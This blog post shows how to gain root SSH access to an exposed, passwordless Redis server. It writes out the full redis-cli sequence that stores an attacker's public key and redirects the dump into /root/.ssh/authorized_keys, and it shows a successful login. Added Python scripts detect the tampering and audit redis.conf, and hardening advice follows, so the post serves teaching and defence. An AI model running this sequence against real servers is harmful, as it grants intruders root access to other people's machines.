Redis attack: remote login

The Redis issue was disclosed long ago. Like MongoDB, it comes from the same combination: listening on a public IP and port by default, no authentication, and starting the service as root.

Prepare two machines:
10.10.0.122: attack server (tester)
10.10.0.91: runs Redis, reachable from the public network, no password, started as root, default port
Generate your own key pair with the ssh-keygen command (just press Enter at every prompt; experienced users can skip this step).

Connect to Redis on machine 91 remotely from machine 122:

[root@localhost ~]# cat /root/.ssh/id_rsa.pub | redis-cli -h 10.10.0.91 -p 6379 -x set ssh-key
OK
[root@localhost ~]# redis-cli -h 10.10.0.91
10.10.0.91:6379> get ssh-key
"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGqmQvQsc7PWmZX6AQU03vnuU1N5JlptmK6dmbT/HZeVrfb2kVtdUV9Nqndf3VSi7OWPZVP2lYgg17EpGk4LOGrh0lq05asSkbYImt7wLGT6ccp7jlfaybqQ3P1RVrJyrZq339eZ8sbGYzvWV/MEZGxgpKzqOfT6797si92P6Ba+9GHkFWifM/X138HFRK1tPtQMvRs5Sb/atOMHLI1+pXthPZyz8IcoN6BbD56SKZuK0bie+nLPEmbxeVXAM0Leq26wSW1XHhhKaFfRSZspl0LZGNramzgRyAmvE8jD4qs0tmWkB+FcvEmBYyCJ/q9BmzSi+E24tlcQ+aG7GoUr5N root@localhost.localdomain\n"
10.10.0.91:6379> CONFIG SET dir /root/.ssh
OK
10.10.0.91:6379> CONFIG SET dbfilename "authorized_keys"
OK
10.10.0.91:6379> save
OK
10.10.0.91:6379> 

There is a problem here: the value is written into the dump file directly after Redis's own content, so without a line break in front of the ssh key the Redis data ends up on the same line as the key, and that line fails authentication as malformed. Simply add two line breaks before the value of the ssh key, or manually add two line breaks before the public key in /root/.ssh/id_rsa.pub (one line break is not enough; this has been tested, and a single line feed does not satisfy the authorized_keys file format).

[root@localhost ~]# redis-cli -h 10.10.0.91
10.10.0.91:6379> get ssh-key
"\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGqmQvQsc7PWmZX6AQU03vnuU1N5JlptmK6dmbT/HZeVrfb2kVtdUV9Nqndf3VSi7OWPZVP2lYgg17EpGk4LOGrh0lq05asSkbYImt7wLGT6ccp7jlfaybqQ3P1RVrJyrZq339eZ8sbGYzvWV/MEZGxgpKzqOfT6797si92P6Ba+9GHkFWifM/X138HFRK1tPtQMvRs5Sb/atOMHLI1+pXthPZyz8IcoN6BbD56SKZuK0bie+nLPEmbxeVXAM0Leq26wSW1XHhhKaFfRSZspl0LZGNramzgRyAmvE8jD4qs0tmWkB+FcvEmBYyCJ/q9BmzSi+E24tlcQ+aG7GoUr5N root@localhost.localdomain\n"
10.10.0.91:6379> 

After setting the key again with the leading line breaks and saving:

[root@localhost ~]# ssh root@10.10.0.91
Last failed login: Tue Sep 11 17:46:26 CST 2018 from 10.10.0.122 on ssh:notty
There was 1 failed login attempt since the last successful login.
Last login: Tue Sep 11 17:08:40 2018 from 10.10.0.122
[root@localhost ~]# 
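
A host-side check for this kind of tampering, added here as an example (it is not part of the original post): a Redis dump written into authorized_keys carries the RDB preamble and binary framing around the key line, and sshd simply skips the lines it cannot parse. The script below reports that residue and lists the key entries sshd would still accept. The sample dump bytes are a constructed approximation of an RDB file, and the key line in it is a constructed, meaningless ssh-rsa blob.

```python
"""Added example, not part of the original post: check an authorized_keys file
for the residue a Redis SAVE leaves behind.

A Redis RDB dump begins with the magic string "REDIS" followed by a version
number, and it wraps every stored value in binary framing. When Redis is made
to write its dump into authorized_keys, that preamble and trailer surround the
key line. sshd silently skips lines it cannot parse, which is why the file
still grants access; this check reports the junk a hand-written file never has.
"""
import base64
import re
import struct

# A key entry: optional options, key type, base64 blob, optional comment.
KEY_RE = re.compile(
    r"(?:^|\s)(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp(?:256|384|521))\s+([A-Za-z0-9+/=]+)"
)


def blob_matches_type(key_type: str, b64: str) -> bool:
    """OpenSSH key blobs start with a length-prefixed copy of the key type."""
    try:
        blob = base64.b64decode(b64, validate=True)
    except ValueError:
        return False
    if len(blob) < 4:
        return False
    (n,) = struct.unpack(">I", blob[:4])
    return blob[4:4 + n] == key_type.encode()


def is_binary(raw: bytes) -> bool:
    """True if the line holds bytes that never appear in a text key file."""
    return any((b < 0x20 and b not in (0x09, 0x0D)) or b > 0x7E for b in raw)


def scan_authorized_keys(data: bytes) -> dict:
    """Return tamper indicators and the key entries sshd would accept."""
    report = {"rdb_magic": data.startswith(b"REDIS"), "binary_lines": 0,
              "unparseable_lines": 0, "accepted_keys": []}
    for raw in data.split(b"\n"):
        if not raw.strip():
            continue
        if is_binary(raw):
            report["binary_lines"] += 1
            continue
        line = raw.decode("ascii").strip()
        if line.startswith("#"):
            continue
        m = KEY_RE.search(line)
        if m and blob_matches_type(m.group(1), m.group(2)):
            comment = line[m.end():].strip()
            report["accepted_keys"].append((m.group(1), comment))
        else:
            report["unparseable_lines"] += 1
    return report


def constructed_key_line(comment: str) -> bytes:
    """Build a syntactically valid but meaningless ssh-rsa entry for the sample."""
    blob = (struct.pack(">I", 7) + b"ssh-rsa"
            + struct.pack(">I", 3) + b"\x01\x00\x01"       # fake exponent
            + struct.pack(">I", 4) + b"\x00\xab\xcd\xef")  # fake modulus
    return b"ssh-rsa " + base64.b64encode(blob) + b" " + comment.encode()


# Constructed approximation of a dump written with dir=/root/.ssh and
# dbfilename=authorized_keys: RDB magic and aux fields, binary framing, the key
# value with the two leading newlines the post describes, then the trailer.
SAMPLE_DUMP = (
    b"REDIS0009\xfa\tredis-ver\x055.0.0\xfa\nredis-bits\xc0@\xfe\x00\xfb\x01\x00\x00"
    b"\x07ssh-key\xc4\x0f\n\n" + constructed_key_line("root@localhost.localdomain")
    + b"\n\xff\x12\x34\x56\x78\x9a\xbc\xde\xf0"
)

if __name__ == "__main__":
    print(scan_authorized_keys(SAMPLE_DUMP))
```

On a real host, call scan_authorized_keys(open("/root/.ssh/authorized_keys", "rb").read()); any rdb_magic or binary_lines hit on a key file is a strong indicator that it was written by a service rather than by an administrator, and accepted_keys tells you which entries still grant access.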

Therefore:
1. Do not expose Redis to the public network, and preferably change the default port as well.
2. Redis should require a password; never run it without one.
3. Do not run Redis as the root user.
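
To turn the three points above into something checkable, here is an added example (not from the original post) that audits a redis.conf text for the settings that made the setup exploitable: a wildcard bind, protected-mode switched off, no or a short requirepass, the default port, and a CONFIG command that is still reachable (it is what let the dump be redirected into /root/.ssh). The weak and hardened configs are constructed for the example, and the requirepass value in the hardened one is a placeholder. The run-as user is set by the service unit or init script rather than in redis.conf, so point 3 is not checked here.

```python
"""Added example, not from the original post: audit a redis.conf for the
settings behind the three recommendations (public exposure, no password, and
the CONFIG command that allowed the dump to be redirected)."""
import shlex

# Bind addresses that expose Redis on every interface.
WILDCARD_BINDS = {"0.0.0.0", "*", "::", "::*"}


def parse_redis_conf(text: str) -> list:
    """Return (directive, args) pairs; redis.conf is one directive per line,
    '#' starts a comment, and values may be double-quoted."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        entries.append((parts[0].lower(), parts[1:]))
    return entries


def audit_redis_conf(text: str) -> list:
    """Return a list of finding codes; an empty list means nothing was flagged."""
    conf = parse_redis_conf(text)
    findings = []

    # No bind at all, or a wildcard address, means the port is public.
    binds = [a.lstrip("-") for d, args in conf if d == "bind" for a in args]
    if not binds or any(b in WILDCARD_BINDS for b in binds):
        findings.append("bind-all-interfaces")

    # protected-mode (Redis >= 3.2) refuses remote clients when no bind or password is set.
    if any(d == "protected-mode" and args[:1] == ["no"] for d, args in conf):
        findings.append("protected-mode-off")

    passwords = [args[0] for d, args in conf if d == "requirepass" and args]
    if not any(passwords):
        findings.append("no-requirepass")
    elif any(len(p) < 16 for p in passwords):
        findings.append("short-requirepass")

    ports = [args[0] for d, args in conf if d == "port" and args]
    if not ports or "6379" in ports:
        findings.append("default-port")

    # Renaming CONFIG to "" disables it; leaving it exposed allows dir/dbfilename changes.
    renamed = {args[0].upper() for d, args in conf if d == "rename-command" and args}
    if "CONFIG" not in renamed:
        findings.append("config-command-exposed")

    return findings


# Constructed: the defaults that made the setup in the post exploitable.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
# requirepass foobared
"""

# Constructed: reachable only from localhost, password required, CONFIG disabled.
HARDENED_CONF = """
bind 127.0.0.1 ::1
protected-mode yes
port 16379
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command CONFIG ""
"""

if __name__ == "__main__":
    print("weak:", audit_redis_conf(WEAK_CONF))
    print("hardened:", audit_redis_conf(HARDENED_CONF))
```

Run it against a deployed file with audit_redis_conf(open("/etc/redis/redis.conf").read()); an empty result covers the first two recommendations, and the third is verified separately by checking which user the redis-server process runs as.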

Tags: ssh Redis network MongoDB

Posted on Thu, 02 Jan 2020 11:48:07 -0500 by penguinboy